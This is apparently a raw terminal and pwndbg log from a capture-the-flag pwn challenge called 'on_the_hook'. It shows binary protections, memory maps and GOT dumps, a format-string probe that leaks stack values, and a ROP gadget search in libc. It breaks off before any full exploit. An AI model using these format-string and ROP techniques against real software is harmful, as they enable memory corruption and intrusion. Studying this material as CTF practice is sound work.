mito@ubuntu:~/CTF/K3RN3LCTF/Pwn_on_the_hook$ checksec on_the_hook
[*] '/home/mito/CTF/K3RN3LCTF/Pwn_on_the_hook/on_the_hook'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)


pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
 0x8048000  0x8049000 r--p     1000 0      /home/mito/CTF/K3RN3LCTF/Pwn_on_the_hook/on_the_hook
 0x8049000  0x804a000 r-xp     1000 1000   /home/mito/CTF/K3RN3LCTF/Pwn_on_the_hook/on_the_hook
 0x804a000  0x804b000 r--p     1000 2000   /home/mito/CTF/K3RN3LCTF/Pwn_on_the_hook/on_the_hook
 0x804b000  0x804c000 r--p     1000 2000   /home/mito/CTF/K3RN3LCTF/Pwn_on_the_hook/on_the_hook
 0x804c000  0x804d000 rw-p     1000 3000   /home/mito/CTF/K3RN3LCTF/Pwn_on_the_hook/on_the_hook
 0x804d000  0x806f000 rw-p    22000 0      [heap]
0xf7dc6000 0xf7de3000 r--p    1d000 0      /usr/lib/i386-linux-gnu/libc-2.31.so
0xf7de3000 0xf7f3e000 r-xp   15b000 1d000  /usr/lib/i386-linux-gnu/libc-2.31.so
0xf7f3e000 0xf7fae000 r--p    70000 178000 /usr/lib/i386-linux-gnu/libc-2.31.so
0xf7fae000 0xf7faf000 ---p     1000 1e8000 /usr/lib/i386-linux-gnu/libc-2.31.so
0xf7faf000 0xf7fb1000 r--p     2000 1e8000 /usr/lib/i386-linux-gnu/libc-2.31.so
0xf7fb1000 0xf7fb3000 rw-p     2000 1ea000 /usr/lib/i386-linux-gnu/libc-2.31.so
0xf7fb3000 0xf7fb5000 rw-p     2000 0      [anon_f7fb3]
0xf7fcb000 0xf7fcd000 rw-p     2000 0      [anon_f7fcb]
0xf7fcd000 0xf7fd0000 r--p     3000 0      [vvar]
0xf7fd0000 0xf7fd1000 r-xp     1000 0      [vdso]
0xf7fd1000 0xf7fd2000 r--p     1000 0      /usr/lib/i386-linux-gnu/ld-2.31.so
0xf7fd2000 0xf7ff0000 r-xp    1e000 1000   /usr/lib/i386-linux-gnu/ld-2.31.so
0xf7ff0000 0xf7ffb000 r--p     b000 1f000  /usr/lib/i386-linux-gnu/ld-2.31.so
0xf7ffc000 0xf7ffd000 r--p     1000 2a000  /usr/lib/i386-linux-gnu/ld-2.31.so
0xf7ffd000 0xf7ffe000 rw-p     1000 2b000  /usr/lib/i386-linux-gnu/ld-2.31.so
0xfffdd000 0xffffe000 rw-p    21000 0      [stack]


x804bfa0:	0x00000000	0x00000000	0x00000000	0x00000000
0x804bfb0:	0x00000000	0x00000000	0x00000000	0x00000000
0x804bfc0:	0x00000000	0x00000000	0x00000000	0x00000000
0x804bfd0:	0x0804bed8	0x00000000	0x00000000	0xf7e1a340
0x804bfe0 <fgets@got.plt>:	0xf7e35e10	0xf7e37cd0	0xf7dfe170	0xf7de4df0
0x804bff0 <setvbuf@got.plt>:	0xf7e384c0	0x00000000	0xf7fb1dc0	0xf7fb1dbc
0x804c000:	0x00000000	0x00000000	0x00000000	0x00000000
0x804c010:	0x00000000	0x00000000	0x00000000	0x00000000

mito@ubuntu:~/CTF/K3RN3LCTF/Pwn_on_the_hook$ ./on_the_hook 
echo:
AAAAAAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
AAAAAAAA,0x40,0xf7fb1580,0x8049292,0x9c6fbb,0x534,0x1,0x41414141,0x41414141,0x2c70252c,0x252c7025

─────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────
 EAX  0xffffd0ac ◂— 'AAAAAAAAAAAAAAAAAA\n'
 EBX  0x804bfd0 (_GLOBAL_OFFSET_TABLE_) —▸ 0x804bed8 (_DYNAMIC) ◂— 0x1
 ECX  0x0
 EDX  0xfbad2288
 EDI  0xf7fb1000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
 ESI  0xf7fb1000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
 EBP  0xffffd0f8 ◂— 0x0
*ESP  0xffffd090 —▸ 0xffffd0ac ◂— 'AAAAAAAAAAAAAAAAAA\n'
*EIP  0x80492d5 (main+116) —▸ 0xfffdc6e8 ◂— 0xfffdc6e8
───────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────
   0x80492cb <main+106>    add    esp, 0x10
   0x80492ce <main+109>    sub    esp, 0xc
   0x80492d1 <main+112>    lea    eax, [ebp - 0x4c]
   0x80492d4 <main+115>    push   eax
 ► 0x80492d5 <main+116>    call   printf@plt                     <printf@plt>
        format: 0xffffd0ac ◂— 'AAAAAAAAAAAAAAAAAA\n'
        vararg: 0x40
 
   0x80492da <main+121>    add    esp, 0x10
   0x80492dd <main+124>    add    dword ptr [ebp - 0x50], 1
   0x80492e1 <main+128>    cmp    dword ptr [ebp - 0x50], 5
   0x80492e5 <main+132>    jle    main+83                     <main+83>
 
   0x80492e7 <main+134>    sub    esp, 0xc
   0x80492ea <main+137>    push   0
───────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────
00:0000│ esp 0xffffd090 —▸ 0xffffd0ac ◂— 'AAAAAAAAAAAAAAAAAA\n'
01:0004│     0xffffd094 ◂— 0x40 /* '@' */
02:0008│     0xffffd098 —▸ 0xf7fb1580 (_IO_2_1_stdin_) ◂— 0xfbad2288
03:000c│     0xffffd09c —▸ 0x8049292 (main+49) ◂— sub    esp, 0xc
04:0010│     0xffffd0a0 ◂— 0x9c6fbb
05:0014│     0xffffd0a4 ◂— 0x534
06:0018│     0xffffd0a8 ◂— 0x1
07:001c│ eax 0xffffd0ac ◂— 'AAAAAAAAAAAAAAAAAA\n'
─────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────
 ► f 0 0x80492d5 main+116
   f 1 0xf7de4ee5 __libc_start_main+245


pwndbg> x/80wx 0xffffd000
0xffffd000:	0xf7fb1580	0x0000003f	0xffffd088	0xf7e371a2
0xffffd010:	0xf7fb1580	0xffffd0ac	0x0000003f	0x0000000a
0xffffd020:	0x00000001	0x00000000	0x00000001	0x00000000
0xffffd030:	0xf7e4199b	0xf7fb25e0	0xf7e44b7d	0xf7e35ea1
0xffffd040:	0xf7fb1580	0xffffd0ac	0x0000003f	0x0000000a
0xffffd050:	0x00000001	0x0000000a	0x00000005	0xf7fb1000
0xffffd060:	0xffffd09a	0xf7fb1000	0xf7fb1000	0x00000000
0xffffd070:	0xf7fb1000	0xf7fb1000	0xffffd098	0x0804bfd0
0xffffd080:	0xf7fb1000	0xf7fb1000	0xffffd0f8	0x080492cb
0xffffd090:	0xffffd0ac	0x00000040	0xf7fb1580	0x08049292
0xffffd0a0:	0x009c6fbb	0x00000534	0x00000001	0x41414141
0xffffd0b0:	0x41414141	0x41414141	0x41414141	0x000a4141
0xffffd0c0:	0xf7fb1000	0xf7fe22f0	0x00000000	0xf7dfe402
0xffffd0d0:	0xf7fb13fc	0x00040000	0x00000000	0x08049353
0xffffd0e0:	0x00000001	0xffffd1a4	0xffffd1ac	0xe258d000
0xffffd0f0:	0xffffd110	0x00000000	0x00000000	0xf7de4ee5
0xffffd100:	0xf7fb1000	0xf7fb1000	0x00000000	0xf7de4ee5
0xffffd110:	0x00000001	0xffffd1a4	0xffffd1ac	0xffffd134
0xffffd120:	0xf7fb1000	0xf7ffd000	0xffffd188	0x00000000
0xffffd130:	0xf7ffd990	0x00000000	0xf7fb1000	0xf7fb1000
0xffffd140:	0x00000000	0x37b4690d	0x748b0f1d	0x00000000
0xffffd150:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd160:	0x00000000	0x00000000	0xf7fe219d	0x0804bfd0
0xffffd170:	0x00000001	0x08049100	0x00000000	0x08049136
0xffffd180:	0x08049261	0x00000001	0xffffd1a4	0x08049300
0xffffd190:	0x08049370	0xf7fe22f0	0xffffd19c	0x0000001c
0xffffd1a0:	0x00000001	0xffffd35f	0x00000000	0xffffd394

0xffffd070:	0xf7fb1000	0xf7fb1000	0xffffd098	0x0804bfd0
0xffffd080:	0xf7fb1000	0xf7fb1000	0xffffd0f8	0x080492da
0xffffd090:	0xffffd0ac	0x00000040	0xf7fb1580	0x08049292
0xffffd0a0:	0x009c6fbb	0x00000534	0x00000001	0x41414141
0xffffd0b0:	0x41414141	0x41414141	0x41414141	0x000a4141


pwndbg> x/80wx 0xffffd080
0xffffd080:	0xf7fb1580	0xffffd11c	0x0000003f	0x0000000a
0xffffd090:	0x00000001	0x00000000	0x00000001	0x00000000
0xffffd0a0:	0xf7e4199b	0xf7fb25e0	0xf7e44b7d	0xf7e35ea1
0xffffd0b0:	0xf7fb1580	0xffffd11c	0x0000003f	0x0000000a
0xffffd0c0:	0x00000001	0x0000000a	0x00000005	0x0804bfd0
0xffffd0d0:	0xf7fb1000	0xf7fb1000	0xf7fb1000	0x00000000
0xffffd0e0:	0xf7fb1d20	0xffffd11c	0xffffd104	0x0804bfd0
0xffffd0f0:	0xf7fb1000	0xf7fb1000	0xffffd168	0x080492da
0xffffd100:	0xffffd11c	0x00000040	0xf7fb1580	0x08049292
0xffffd110:	0x009c6fbb	0x00000534	0x00000003	0x41414141
0xffffd120:	0x41414141	0x41414141	0x41414141	0x0a414141
0xffffd130:	0xf7fb1000	0xf7fe22f0	0x00000000	0xf7dfe402
0xffffd140:	0xf7fb13fc	0x00040000	0x00000000	0x08049353
0xffffd150:	0x00000001	0xffffd214	0xffffd21c	0xbcfce900
0xffffd160:	0xffffd180	0x00000000	0x00000000	0xf7de4ee5
0xffffd170:	0xf7fb1000	0xf7fb1000	0x00000000	0xf7de4ee5
0xffffd180:	0x00000001	0xffffd214	0xffffd21c	0xffffd1a4

mito@ubuntu:~/CTF/K3RN3LCTF/Pwn_on_the_hook$ ropper -f /lib/i386-linux-gnu/libc-2.23.so --nocolor > rop_l.txt
[INFO] Load gadgets for section: PHDR
[LOAD] loading... 100%
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
mito@ubuntu:~/CTF/K3RN3LCTF/Pwn_on_the_hook$ grep ": add esp" rop_l.txt 
0x0005bd1b: add esp, -0x38; cli; call dword ptr [eax - 0x73]; 
0x0001df3e: add esp, -0x40; cli; call dword ptr [eax - 0x18]; 
0x0005b928: add esp, 0x1004; pop ebx; pop esi; ret; 
0x0005b938: add esp, 0x1004; xor eax, eax; pop ebx; pop esi; ret; 
0x001123f9: add esp, 0x100; pop ebx; pop esi; pop edi; ret; 
0x00076987: add esp, 0x100; pop ebx; ret; 
0x00076a71: add esp, 0x100; ret; 


